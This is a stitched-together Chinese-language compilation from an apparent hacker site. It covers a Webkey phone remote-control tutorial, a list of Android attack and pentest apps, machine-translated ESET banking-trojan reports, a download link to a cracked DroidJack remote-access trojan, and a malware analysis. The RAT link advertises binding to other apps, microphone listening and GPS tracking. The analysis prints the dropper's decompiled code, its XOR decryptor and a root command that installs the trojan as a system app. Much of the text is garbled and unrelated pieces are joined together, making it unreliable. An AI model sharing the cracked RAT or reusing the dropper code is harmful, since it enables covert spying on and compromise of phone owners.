中国骇客云工具远控工具之手机远控远程控制你的Android手机

谈到远程控制android手机软件,很早之前,德国开发的Teamviewer软件即已经做到在电脑和手机之间灵活的双向切换控制操作,稍微略显不足的地方就是Teamviewer只支持安卓系统的手机。现在危险漫步要给大家介绍的这款软件是Webkey,不但支持安卓系统手机的操作,同时可以摆脱数据线连接,在无线的网络中远程控制手机。这里以三星手机T959为例(很普通的手机,请不要扔番茄和鸡蛋)。点击我们下载下来的webkey.apk安装文件(可以直接通过数据线连接手机安装或是有wifi的,安装一个豌豆荚连接下,双击安装),红色圆圈出来的即是已经安装的webkey软件。

2K5N03D2H2X{K8G`M{83E)I.jpg

这样就完成了安装过程。这个软件的一个优点就是可以通过网络来执行远程控制操作,摆脱数据线的困扰,只要你连接上wifi,即可以很方便的操作。当然不可缺少的条件就是你的手机必须是root权限,之前应该是有不少合约机,出厂并未激活root.貌似现在应该大多都会有root权限了。

下面需要对webkey进行简单的设置,取消开机启动。这样一来就可以避免每次手机在换电池或是做其他操作的过程中因为重启而每次开机都启动webkey。

去除手机上方状态栏显示webkey的图标状态,尽管去除了,但是webkey-样会在系统后台继续运行。完成开机和运行状态的一个设置。

只要保证“保持与androdwebkey的连接”和“允许浏览器中注册新用户”两个选项被选中就可以。“使用此IP地址连接DynDNS”,这个选项是你有获取公网地址,并将地址解析到外网的网站上,通过这个来访问。这边就跳过,有兴趣的朋友可以去注册一个域名站点进行测试。

点击“手机昵称设置”按钮进行对呢称的简单设置。帮你的手机设置一个好记的名称。往后通过浏览器远程控制手机的时候,访问的管理地址就是Webkey的域名加上你手机昵称路径,比如这里的jihn就是你的手机昵称了。既然可以通过wifi连接网络远程控制你的手机,webkey也给出了手机在网络中自动获取的一个IP地址,你一样可以通过输入172.18.14.233来管理访问你的手机,这里172.18.14.233就是你局域网分配给你手机的IP地址。下一步,也是比较重要的一步操作,那就是用户管理了。当然要设置成不是每个用户都可以远程控制你的手机。让我们自己动手来为手机创建一个新用户吧。这样设置完成后,我们将手机和电脑都连接到互联网上之后,就可以对手机进行远程控制了。不通过手机数据线的哦。上面提到的第5个设置步骤中有讲到局域网的分配给手机的IP地址,这里也可以通过外网远程控制你的手机,也就是获知手机的公网IP的话,一样可以是手机在家,人在公司或是路上,前提是要有wifi,呵呵,连接控制你的手机是没问题的。查看手机公网地址可以通过手机浏览器访问诸如ip138或是114best来查看手机所在的公网IP地址。以下简单示范局域网内如何远程控制手机。

打开桌面的浏览器访问androidwebkey或者是192.168.1.102,就可以看到远程控制管理界面了。图片显示的页面地址源显示未知,实际上是来自美国的IP地址,只是网站数据库没有收录而已,不影响操作控制。这边就提示要求我们输入用户名和密码,也就是我们在上述操作中谈到的第6个步骤中的用户和密码。在这个简洁的管理页面中,给大家分享下远程控制管理的功能。

(1)页面布局

大致的页面布局如下:顶端是功能导航条,页面左边显示的是手机的实时远控屏幕。右边是操作的功能菜单,右下方还有个远程聊天窗口。一起来了解一下每个标签页的具体应用。

(2)电话选项卡

这是比较常用的功能,同样是登录控制台后的第一个页面。设置完成之后可以在远程界面中用鼠标直接操作你的手机,譬如设置呼叫转移。

远控区最下方的一排功能键是Webkey为手机设置的,它等同于手机上的物理按键,更有趣的是,按键的键值还可以自行更改设置。

(3)功能菜单

右边的功能菜单也很丰富,基本的远程控制操作都可以在这里实现:远程键盘、打开网址、运行程序、手机信息、关闭进程等。个人比较喜欢的是远程键盘,相信可以用键盘代替手机的输入法或者是手写,速度应该是有很大的提升。像手机信息或是关闭进程一样是很实用的一些功能。

(4) GPS

这是个很强大的功能,可以起到防止手机被盗的效果。一旦你的手机被偷走,就可以知道手机的位置。呵呵,本人手机是不怎么好,应该是不会引起兴趣了,不过一样可以起到防范未然的效果,还可以定位最后已知手机的位置。而且提供了两种定位方式,在室外可以通过GPS卫星精确定位,倘若手机在室内还可以得到运营商定位。是不是很好用的GPS呢?

(5)短信和通话列表

这两个功能很简单,可以实现远程收发短信,查看通话记录详情。这样即使你手机忘记带也可以知道手机上的一些通话来往的情况,清楚是谁发了短信给你了。并且你可以远程控制你的手机给人家回复,这一切只需要你在电脑上通过网络直接在这个管理页面操作,简单方便,快捷,不需要再时不时的担心你的手机是否随身携带或是烦恼手写输入或是手机键盘给对方发短信的速度太慢。

(6) Net

这是一个很实用的功能,前提是要拥有root权限。通过net可以帮助你了解你的手机网络流量使用情况,包括各个网络接口,也就是和tcp,udp收发包一样的记录信息,按日统计,(7)通知和终端

这两个选项卡可能对普通用户用处不大。通知的意思是Webkey会每隔半分钟刷新一次,显示未读信息及未接电话,当操作触发时,手机会按照你预先设置的提醒方式来显示内容。终端就是一个远程命令行,你可以通过它在shell命令行下面运行Linux指令。

(8)导出

这个功能也是相当的不错。不过在当你手机失窃并基本回归无望的时候才用到它。它能帮你远程获取手机里的联系人、短信、通话记录,然后就像豌豆荚或是91助手一样可以导出这些信息并保存到本地电脑硬盘中。

(10)目录浏览和SD存储卡

这两个功能就相当于是利用wifi连接网络后,在局域网内进行远程文件管理器。采用了Aj aXplorer组件,让远程文件管理也很方便。

你还可以远程从你手机里下载SD卡里的任何文件传输或者拷贝到其他位置,如果是图片文件的话,还可以远程预览图片。

结尾再和大家聊一下以下几点事项:

这个应用软件属于高级玩家应用,需要一定的动手操作能力。因为有的功能需要对手机ROOT(合约机可能不太合适做这个操作了)。

要通过电脑对手机进行远程控制,那么你的手机必须保持网络在线并连通。通过网络控制手

机时,可能产生较大流量,请确定你有足够的流量,并保证手机实时在线。建议手机还是使用wifi连接互联网网络,这样一来和电脑可以很融洽的在一个网络内进行对话操作。

好了,希望大家感兴趣的话,可以自己尝试安装软件来试试看,有兴趣的话可以到我的博客上面与危险漫步进行指导和交流。

中国骇客云工具介绍Android设备的渗透测试应用程序

说明

根据最近的研究,移动电话用户数量超过PC用户。同时,人自己的Android手机数量迅速增加。安卓手机给人们带来了很多的方便,因为它可以帮助人们做很多工作,他们可以在电脑上,不受位置限制。

Android已经成为一个需要而不是奢侈的这些日子里,其受欢迎程度迅速增加可用的智能手机中。有操作系统,可这些天很多,但其中,Android是最好的,因为它可以轻松处理也是很容易实现,因为它的开源性。

Android应用程序的开发已经成为开发移动应用程序的重要工具。软件开发工具包由Android帮助开发人员开始开发和应用工作的瞬间,所以应用程序可以快速实现。

现在,使用Android平台的渗透测试是可能的,就没有必要把你的系统对各地区开展你的笔测试。我们都知道,渗透测试涉及的人进入他们的系统的参与,但通过使用你的Android手机,你可以在最好的方法你可以在任何位置。

以下是你可以使用渗透测试的Android应用程序。

1。网络工具

Port Scanner:这个工具可以让您扫描远程主机上的端口,通过其IP或域名,你可以知道哪些端口是打开主机上的。它支持3G,协议识别,和许多其他功能。

fing:发现是一个网络分析的专业软件。一个简单而直观的界面可以帮助你评估安全水平,检测入侵者和解决网络问题。它可以帮助你找出哪些设备连接到你的Wi-Fi网络,在短短的几秒钟。

网络发现:网络发现与寻找。它是用于设备发现和作品作为一个局域网端口扫描器。

tpacketcapture:tpacketcapture不捕包不使用任何root权限。tpacketcapture采用Android操作系统提供的vpnservice。捕获的数据保存在外部存储PCAP文件格式。

Droidsheep:Droidsheep是Andrew Koch写的。它作为一种非加密的网站会话劫持和允许你保存cookies文件/会议后分析。它不再是可以从开发商的网站即droidsheep.de。

FaceNiff:faceniff是一个应用程序,允许你闻和拦截Web会话配置在无线移动连接。它是可能的会话劫持只有wifi不能使用EAP,但它应该工作在任何私人网络。

2。两个

LOIC:Loic是一个网络压力测试的拒绝服务攻击的应用工具。Loic执行拒绝服务(DoS)攻击(或多个人,用于当一个DDoS攻击)的洪水的服务器的TCP或UDP数据包与破坏特定主机服务的意向目标站点。

AnDOSid:andosid允许安全专业人士来模拟一个DoS攻击。andosid APP推出一个HTTP洪水攻击,在HTTP请求的数量变得如此庞大,受害者的服务器出现故障回应他们。当服务器开始依靠太多的系统资源,它崩溃。

三.数据包嗅探器

拦截-吴:截击-NG是一种多功能网络工具包。有几个著名的独立工具的功能,而且提供了一个良好的和独特的Android Wireshark的替代。

的主要特点是:

  • 操作系统检测网络发现
  • 网络流量分析
  • 密码恢复
  • 文件恢复

鲨鱼的根:流量嗅探器,在3G和WiFi的作品(在Froyo系留方式太作品)。打开转储,使用Wireshark或类似软件,预览给手机,使用鲨鱼的读者。

PacketShark:这是一个数据包嗅探器的应用。功能包括友好的捕获选项界面,过滤支持,捕捉住观,与Dropbox捕获文件上传。它允许查看捕获的数据包不需要安装其他应用程序作为一个观众。

4。扫描仪

wpscan:wpscan是一个黑盒子的WordPress安全扫描器用Ruby写的,试图在Wordpress发现已知的安全弱点。这个程序是由Alessio Dalla Piazza。它的用途是为安全专业人士或WordPress的管理员来评估他们的WordPress安装的安全态势。wpscan包括用户枚举并将检测TimThumb文件,主题和WordPress版本。

nessus:Nessus是一种流行的渗透测试工具,用来与客户/服务器体系结构执行漏洞扫描。Nessus的Android应用程序可以执行以下任务。

  • 连接到Nessus服务器(4.2或更高)
  • 现有服务器上启动扫描
  • 启动、停止或暂停运行扫描
  • 创建和执行新的扫描和扫描模板
  • 视图和过滤器报告

网络映射:

  • 网络管理员可以扫描您的网络在办公室和导出为CSV通过Gmail给你地图在您的局域网设备是一个非常快的网络扫描器。
  • 包括用于安全审计扫描端口扫描和MAC的供应商数据库识别网卡制造商。
  • 可以检测防火墙和隐形电脑,非常有用,如果你正在寻找一个Windows防火墙/盒,你不能看到你的网络。
  • 如果你想找个FTP服务器,SSH服务器,SMB服务器,等你的网络和将帮助你诊断故障。
  • 你可以保存扫描结果为CSV文件,可导入Excel电子表格/谷歌/ LibreOffice。
5。webattack

DroidSQLi:droidsqli是第一个自动化脚本注入工具为Android。它允许你测试你的MySQL的Web应用程序对SQL注入攻击。

droidsqli支持以下的注射技术:

  • 基于时间的注射
  • Blind注射液
  • 基于错误注入
  • 正常的注射

它会自动选择使用最好的技术和采用一些简单的滤波器的规避方法。

sqlmapchik:sqlmapchik是一个跨平台的GUI工具sqlmap流行sqlmap。它的主要目的是要在移动设备上使用。在Android设备上安装sqlmapchik最简单的方法是下载它从谷歌播放。

6。渗透测试套件

dsploit:dsploit是一个Android网络分析和渗透套件旨在提供IT安全专家们在移动设备上进行网络安全评估的最完整和最先进的专业工具。dsploit一旦开始,你将能够很容易地映射你的网络主机的操作系统指纹活着和运行服务,为已知的漏洞搜索,许多TCP协议破解登录程序,在中间的攻击,如密码嗅探执行人、交通实时操作,等等。

这些都是在应用程序可用的模块:

  • routerpwn
  • 微量
  • 端口扫描器
  • 检查员
  • 漏洞查找
  • 登录饼干
  • 包的伪造者
  • 中间人

revenssis穿透组曲revenssis渗透套件是一套所有使用计算机和Web应用程序的安全工具的有用的类型。

  • Web漏洞扫描器包括:
  • SQL注入扫描器
  • XSS扫描仪
  • DDoS的扫描仪
  • CSRF的扫描仪
  • SSL misconfiguration扫描仪
  • 本地和远程文件包含(RFI / LFI)扫描仪
  • 如有用的工具:
  • Whois查询,IP查找、壳、SSH、黑名单查询工具,平工具
  • 取证工具(执行)如恶意软件分析仪,哈希饼干、网络嗅探、ZIP/RAR密码器,社会工程的工具,逆向工程工具。
  • 漏洞研究实验室(来源包括:撒旦漏洞搜索引擎,exploitsearch,利用分贝,OSVDB和NVD NIST)
  • 自扫描和防御工具为你的Android手机对漏洞
  • 蓝牙连接的安全工具,WiFi和互联网。(在实现NFC,WiFi直接和USB)

两雷:两雷是一个综合性的网络诊断工具,可以在按下一个按钮复杂的审计和渗透测试。它提供了基于云计算的报告,引导您通过简单的指导,确保网络安全。

两雷提供了一个全面的完全可定制的扫描显示一切从认证、后门和蛮力试图数据库,DNS协议特定的攻击–包括恶意接入点。

7。一位不愿透露姓名的

机器人:机器人是一个免费的代理应用程序,使其他应用程序更安全地使用互联网。机器人使用Tor加密您的互联网流量,然后隐藏它的弹跳通过一系列世界计算机。Tor是一个开放的网络,帮助你抵御网络监控的一种形式,威胁到个人的自由和隐私,商业机密和国家安全的活动和关系,称为流量分析。

  • 机器人是利用互联网在Android的最安全的方式。期。机器人弹跳你的加密流量多次通过世界各地的计算机上,而不是直接连接你的VPN和代理。这个过程更长一点,但强大的隐私和身份保护是值得等待的。
  • 使用Orweb,访问任何网站最匿名的方式,即使是正常的封锁,监视,或隐藏的网络。
  • 使用gibberbot与机器人秘密与任何人聊天,任何地方免费。
  • 任何已安装的应用程序可以使用Tor的代理功能,使用设置。你可以使用专用的Web搜索与DuckDuckGo。
  • 机器人可以通过Tor配置透明代理你所有的互联网流量。您也可以选择特定的应用程序要使用通过Tor。
  • 机器人的软件是免费的。

OpenVPN:openvpn连接是官方的全功能的Android VPN客户端的OpenVPN接入服务器、私有的隧道VPN和OpenVPN的社区,通过OpenVPN技术开发有限公司

  • 不需要一个根深蒂固的设备。
  • 容易进口。从SD卡和型材,OpenVPN接入服务器、私有的隧道或通过浏览器链接。
  • 改进的电源管理–偏好设置允许VPN停留在低功耗状态,每当屏幕空白或网络不可用。
  • Android的钥匙链整合–OpenVPN配置文件可能参考Android钥匙扣一个证书/密钥对。
  • 支持硬件支持的密钥
  • 支持多因素身份验证使用OpenVPN静态和动态的挑战/响应协议。
  • 完整的IPv6支持(在隧道和传输层)。

orweb:Orweb是最隐私增强Web浏览器在Android访问任何网站,即使是正常的审查,监视,或隐藏的网络。Orweb是在Android上最安全的浏览器。或者被跟踪和审查你的加密流量的弹跳几次通过世界各地的计算机上,而不是直接连接你的VPN和代理。这个过程更长一点,但强大的隐私和身份保护是值得等待的。

  • 或者绕过几乎每一种网络限制。
  • Orweb不会存储你所访问的网站的任何信息。
  • 你可以防止网站安装任何Cookie访问你(可以追踪你的网上活动),让他们选择,或允许任何网站创建cookies。
  • JavaScript,对恶意软件常用的攻击方法,默认是禁用的。
  • orweb是开源的
  • 或者试图阻止Flash加载在你访问的网站,阻挡了许多常见的安全威胁。
  • 或者有:阿拉伯语、中文、荷兰语、英语、世界语、波斯语、法语、德语、匈牙利语、意大利语、俄语、西班牙语、挪威、瑞典和西藏。

结论

Android操作系统已经进展很快。一个创新的、开放的平台,Android是最流行的移动操作系统。它可以很好地解决移动市场日益增长的需求。由于Android的快速增长,开发商现在专注于Android开发环境的工具。上面提到的Android应用程序证明。软件开发工具包由Android可以帮助开发者实现相同。

以上讨论的应用程序从你的Android手机进行渗透测试方法。我们可以实现匿名,可以通过Android手机进行网络攻击。它也为我们提供了渗透套房和其他网络工具

发布的Android恶意软件的源代码,用于运行银行僵尸网络

这个新的Android恶意软件银行最近发现在谷歌Play ESET发现再次在野外,更针对银行。这种表面的威胁进一步调查发现其代码中使用的是公开的几个月前的源代码建立。

检测由ESET作为trojan.android/spy.banker.hu的早期版本(1.1版–的源代码作者标记)和2月6日报道TH。恶意软件是通过谷歌游戏作为一个木马版本的一个合法的天气预报中的应用分布好天气。特洛伊目标22土耳其移动银行应用程序,试图收获凭据使用假冒的登录表单。此外,它可以被感染的设备远程锁定和解锁,以及拦截短信。

上星期日,我们发现在谷歌播放的版本新的木马,伪装成另一个合法的天气应用程序,这个时候世界天气。特洛伊,检测由ESET作为trojan.android/spy.banker.hw(1.2版),可在谷歌Play商店从2月14日TH直到被报道由ESET和拉从2月20日的商店TH

连接点

第二发现导致另一轮的调查,提供了一些有趣的启示。

事实证明,这些都是基于免费的Android木马的源代码是公开的在线。据称,从头写起,Android的恶意软件的“模板”代码,随着C&C服务器–包括Web控制面板–已经在俄罗斯论坛自12月19日以来已可用的代码TH,2016

图1–源代码的Android恶意软件和C & C在俄罗斯论坛公开

随后的调查带来的结果博士网络我们的关注,他们分析了一个恶意软件的早期的变种(由我们系统自12月26日检测TH2016,安卓/间谍。银行家HH)。

然而,这种变异并不直接连接到那些我们在谷歌播放找到,即使我们发现它同样检测名义下,版本1。我们能够确认这获得了僵尸网络的C&C服务器控制面板后,这是启动和运行,在我们调查的时间。通过控制面板,我们能够收集信息关于所有2800感染的僵尸网络恶意软件的版本。

图2–C & C Web控制面板上市的恶意软件的受害者

下面是用户群体受到了恶意软件的概述,基于C和C控制面板中列出的僵尸网络数据:

有趣的是,C&C服务器本身,活动自2017年2月2日以来,已接近谁有网址,无需任何证件。

图3–调查时间表

它是如何运行的呢?

新发现的版本基本上相同的功能作为它的前身。在它的顶部采用了从原来的合法应用天气预报功能,trojan.android/spy.banker.hw能够锁定和解锁被感染的设备远程设置锁屏密码和短信拦截。

两者之间唯一的区别似乎是一个更广泛的目标群体–恶意软件现在影响69英国、奥地利用户,德国和土耳其的银行应用程序的–和更先进的混淆技术。

图4–谷歌恶意APP游戏

图5–绿色–合法世界天气图标;红–恶意版本

该木马还具有一个内置的通知功能,其目的只能验证访问C&C服务器后。原来,该恶意软件能够在受感染的设备显示假通知,提示用户启动一个应用程序在目标银行从各银行的一个“重要信息”的名义。通过这样做,在一个虚假的登录屏幕形式恶意活动触发。

图6–C & C发送伪造的通知消息的受感染的设备

图7–假冒的银行应用程序通知从C&C发送

我的设备被感染了?我怎么清理?

如果你最近从Play商店安装了一个天气应用程序,你可能要检查,如果你没有这一银行木马的受害者。

In case you think you might have downloaded an app named Weather, look for it under Settings -> Application Manger. If you see the app depicted in Fig. 8, and also find “System update” under Settings -> Security -> Device administrators (Fig. 9), your device has been infected.

清洁您的设备,我们建议你向一个移动安全解决方案,或者你可以手动删除恶意软件。

To manually uninstall the trojan, it is first necessary to deactivate its device administrator rights found under Settings -> Security -> System update. With that done, you can uninstall the malicious app in Settings -> Application Manger -> Weather.

图8:在应用程序管理器的木马

图9:恶意软件伪装成有源设备管理员在系统更新

如何保持安全

而这背后的僵尸网络攻击者的特定群体选择传播恶意软件的木马程序通过天气和目标列在文章底部的银行,没有保证的代码不是或不被用在别的地方。

记住,要坚持一些基本的原则来保护移动恶意软件很好。

虽然不是完美无瑕,谷歌Play也采用先进的安全机制,防止恶意软件了。这可能不会与其他应用程序商店或其他来源不明的情况下,选择谷歌官方Play商店尽可能。

而从Play商店下载,确保能在安装或更新知道应用程序的权限。而不是自动给一个应用程序的权限要求,考虑他们的意思是应用程序以及你的设备。如果任何事情了,读什么其他用户写在他们的评论和下载相应的反思。

运行你已经安装在您的移动设备后,请继续关注哪些权限和权利要求。一个应用程序不会运行没有高级权限,没有连接到其预定的功能可能是一个应用程序你不想安装在你的手机上。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题

你也可以阻止由ESET的站在今年的移动世界大会

样品

包的名字搞砸检测
goodish.weatherca2250a787fac7c6eef6158ef48a3b6d52c6bc4bAndroid / spy.banker.hh
goodish.weathera69c9bad3db04d106d92fd82ef4503ea012d0da9Android / spy.banker.hu
follon.weatherf533761a3a67c95dc6733b92b838380695ed1e92Android / spy.banker.hw

有针对性的应用

Android / spy.banker.hh和Android / spy.banker.hu:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank

Android / spy.banker.hw:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.android
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank
com.isis _ papyrus.raiffeisen _付费的_ eyewdg
at.spardat.netbanking
at.bawag.mbanking
at.volksbank.volksbankmobile
com.bankaustria.android.olb
at.easybank.mbanking
com.starfinanz.smob.android.sfinanzstatus
com.starfinanz.smob.android.sbanking
de.fiducia.smartphone.android.banking.vr
com.db.mm.deutschebank
de.postbank.finanzassistent
de.commerzbanking.mobil
com.ing.diba.mbbr2
de.ing_diba.kontostand
de.dkb.portalapp
com.starfinanz.mobile.android.dkbpushtan
de.consorsbank
de.comdirect.android
mobile.santander.de
de.adesso.mobile.android.gad
com.grppl.android.shell.bos
uk.co.bankofscotland.businessbank
com.barclays.android.barclaysmobilebanking
com.barclays.bca
com.ie.capitalone.uk
com.monitise.client.android.clydesdale
com.monitise.coop
uk.co.northernbank.android.tribank
com.firstdirect.bankingonthego
com.grppl.android.shell.halifax
com.htsu.hsbcpersonalbanking
com.hsbc.hsbcukcmb
com.grppl.android.shell.cmblloydstsb73
com.lloydsbank.businessmobile
uk.co.metrobankonline.personal.mobile
co.uk.nationwide.mobile
com.rbs.mobile.android.natwest
com.rbs.mobile.android.natwestbandc
com.rbs.mobile.android.rbsm
com.rbs.mobile.android.rbsbandc
uk.co.santander.santanderuk
uk.co.santander.businessuk.bb
com.tescobank.mobile
uk.co.tsb.mobilebank
com.rbs.mobile.android.ubn
com.monitise.client.android.yorkshire

中国骇客提醒您近期Android木马猖狂模仿用户点击下载危险的恶意软件

Android用户已经接触到一个新的恶意程序模仿Adobe Flash Player作为多种危险的恶意软件的一个潜在的入口。的应用,检测由ESET安全软件为Android / trojandownloader.agent.ji,花样其受害者给予它在Android访问菜单特殊权限和使用这些下载并执行攻击者选择额外的恶意软件。

根据我们的分析,该木马的目标设备上运行Android,包括最新的版本。它是通过入侵网站–成人视频网站的分布,但也通过社会媒体。安全措施的借口下,网站引诱用户下载一个假的Adobe Flash Player更新。如果受害者属于合法寻找更新屏幕,运行安装,他们有更多的欺骗性的屏幕期待。

图1:假冒的Flash Player更新屏幕

那怎么使用呢?

下一个虚假的屏幕弹出以下安装成功,声称“太耗能量”并要求用户打开一个假的“节省电池”的模式。像大多数恶意弹出窗口,消息不会停止,直到受害者出现了并同意启用服务。这将打开Android访问菜单、列表显示服务可及性功能。合法的中,一个新的服务(在安装期间创建的恶意软件)命名为“节省电池”出现。然后服务请求的权限监控你的行动检索窗口内容打开通过触摸来探索–所有关键的未来的恶意行为,使攻击者模仿用户的点击和选择显示在屏幕上的任何事。

图2:弹出屏幕要求“节约电池”安装后

图3:辅助功能菜单与Android恶意服务

图3:辅助功能菜单与Android恶意服务

一旦服务启用,假冒的Flash播放器图标隐藏用户。然而,在这种背景下,恶意软件正忙着联系C&C服务器和它提供的关于妥协的设备信息。服务器URL导致检测的情况下,网络罪犯的选择–恶意应用程序响应,银行恶意软件(虽然它可以是任何的恶意软件包括广告软件通过间谍软件,并对勒索)。获取恶意链接后,受损的设备显示一个虚假的锁屏不能选择关闭它,包括正在进行的恶意活动下。

图5:锁屏覆盖恶意活动

这是当允许模仿用户的点击就派上用场了–恶意软件现在是免费下载,安装,执行并激活额外的恶意软件的设备管理员权限,在用户不知情的情况下,却依然看不见假锁屏下。在应用程序的秘密把戏完成,覆盖屏幕消失,用户可以继续使用移动设备–现在被下载的恶意软件。

我的设备被感染了?我怎么清理?

如果你认为你可能有过去安装这个假冒的Flash播放器的更新,你可以很容易地通过检查储蓄电池在辅助菜单验证服务。如果上市的服务,您的设备很可能被感染。

拒绝服务的权限只会带你回到第一个弹出屏幕并不会摆脱Android / trojandownloader.agent.ji。

To remove the downloader, try manually uninstalling the app from Settings -> Application Manager -> Flash-Player.

In some instances, the downloader also requests that the user activate Device administrator rights. If that turns out to be the case and you can’t uninstall the app, deactivate the administrator rights by going to Settings -> Security -> Flash-Player and then proceed with uninstalling.

即使这样,你的设备可能仍然是由无数的恶意程序通过下载安装感染。确保你的设备是干净的,我们建议使用一个有信誉的移动安全应用程序作为一种轻松的方法来检测和消除威胁。

如何保持安全

为了避免处理讨厌的移动恶意软件的后果,预防是关键。除了坚持值得信赖的网站,有更多的事情可以做,以保持安全。

如果你在你的浏览器下载的应用程序或更新,经常检查URL地址来确定你打算从源码安装。在这种特殊情况下,得到您的Adobe Flash Player更新唯一安全的地方是从Adobe官方网站。

运行你已经安装在您的移动设备后,注意哪些权限和权利要求。如果一个应用程序请求的权限,似乎不适合它的功能,不使这些没有仔细检查。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题。你也可以阻止由ESET的站在今年的移动世界大会

从被感染的设备视频采集(时间编辑)

视频片段(截取自被感染的设备)

http://www.welivesecurity.com/2017/02/14/new-android-trojan-mimics-user-clicks-download-dangerous-malware/

分析示例

Package NameHashDetection name
loader.com.loader4F086B56C98257D6AFD27F04C5C52A48C03E9D62Android/TrojanDownloader.Agent.JI
cosmetiq.flC6A72B78A28CE14E992189322BE74139AEF2B463Android/Spy.Banker.HD

安卓手机远控神器–Droidjack(中国骇客云破解版)

手机远控软件程序破解版链接: https://pan.baidu.com/s/1dF3i9GX 密码: 2fps

Droidjack是一款针对安卓手机远程管理工具,你可以利用它在PC上对手机进行远程操控,不仅功能强大,使用也很方便。

功能特性

1、可以生成一个APK,绑定在被控手机的任何APP上
2、可在电脑端控制手机,包括浏览、传输、删除文件等
3、可进行SMS短信收发和查看功能
4、可以控制手机的电话功能
5、联系人管理
6、麦克风监听
7、GPS定位
8、APP管理

再次提醒大家,不用滥用安全工具的功能哦。

[转载] Android 木马远控1.3(完整免杀进程植入版)

 

工具

ApkTool、dex2jar、DJ Java Decompiler分析必备

python2.6编写解密脚本

分析

这个样本通过捆绑软件SD-Booster来达到感染的目的,在安装运行被感染的SD-Booster时,木马就会自动安装进Android系统,为了尽快找到感染部分,下载未感染的SD-Booster进行反编译对比,结果如图 1所示:

 

图 1

程序被植入了“com.android.md5”与“com.gamex.inset”两个包,首先找到植入程序的加载处,在SDBoost类的onCreate()方法中插入了如下代码:

[Python] 纯文本查看 复制代码

?

1

2

3

4

5

public void onCreate(Bundle paramBundle) {

    super.onCreate(paramBundle);

    A.b(this);

    …

A是“com.gamex.inset”包中的类,A.b()方法代码如下:

[Python] 纯文本查看 复制代码

?

1

2

3

4

5

6

public static void b(Context paramContext)

  {

    context = paramContext;

    Intent localIntent = new Intent(paramContext, Settings.class);

    ComponentName localComponentName = paramContext.startService(localIntent);

  }

直接启动的是Settings.class服务,这个服务很简单,启动代码是这样的:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

public void onStart(Intent paramIntent, int paramInt)

  {

    super.onStart(paramIntent, paramInt);

    new Settings.1(this).start();

  }

class Settings$1 extends Thread

{

  public void run()

  {

    if ((!A.a) && (A.c()) && (A.d(A.context)))

    {

      A.a = 1;

      Settings localSettings = this.this$0;

      new C(localSettings).start();

    }

    while (true)

    {

      return;

      this.this$0.stopSelf();

    }

  }

}

[size=10.5000pt]A.a初始化为0,用来判断木马是否已经运行,A.c()只有一行代码判断SD卡是否已经准备好,为后面的病毒下载做准备,A.d()判断木马程序“com.android.setting”是否已经安装,如果没有安装且满足上面的条件就启动C线程来安装木马,C类的run()方法在Dex2jar中显示不了,在DJ Java Decompiler中可以看到完整的反编译的代码,线程通过context.getAssets().open(“logos.png”)读取木马文件,然后通过解密运算得到最终的apk安装文件,解密代码我用python实现如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

# -*- coding:utf-8 -*-

import sys

def main(filename):

    infile = file(filename,”rb”)

    outfile = file(filename[:-4]+”.apk”,”wb”)

    while 1:

        c = infile.read(1)

        if not c:

            break

        c = chr(ord(c) ^ 18)

        outfile.write(c)

    outfile.close()

    infile.close()

if __name__ == ‘__main__’:

main(sys.argv[1])

解密只是将整个文件与0x12异或而以,运行“python decrypt_apk.py logos.png”就会生成logos.apk木马文件。在上一步的解密完成后,调用了a(String)方法来安装木马,代码如下:

[mw_shl_code=python,true]protected static void a(String paramString)

  {

    try

    {

      Process localProcess = Runtime.getRuntime().exec(“su”);

      OutputStream localOutputStream = localProcess.getOutputStream();

      DataOutputStream localDataOutputStream = new DataOutputStream(localOutputStream);

      localDataOutputStream.writeBytes(“mount -o remount rw /system \n”);

      String str = “cp -i ” + paramString + ” /system/app/ComAndroidSetting.apk\n”;

      localDataOutputStream.writeBytes(str);

      Thread.sleep(20000L);

      localDataOutputStream.writeBytes(“chmod 644 /system/app/ComAndroidSetting.apk\n”);

      localDataOutputStream.writeBytes(“exit\n”);

      localDataOutputStream.flush();

      int i = localProcess.waitFor();

      return;

    }

    catch (IOException localIOException)

    {

      while (true)

        localIOException.printStackTrace();

    }

    catch (InterruptedException localInterruptedException)

    {

      while (true)

        localInterruptedException.printStackTrace();

    }

  }

邪恶的代码将整个程序复制到了“/system/app/”目录下,使其成为系统程序!在安装完成后运行如下代码来发送广播与停止Settings服务:

        ntent intent = new Intent(“kurhjfngjhfjghdfjgjjdh”);

        context.sendBroadcast(intent);

        Intent intent1 = new Intent(context, com/android/md5/Settings);

        boolean flag3 = context1.stopService(intent1);

[/mw_shl_code]

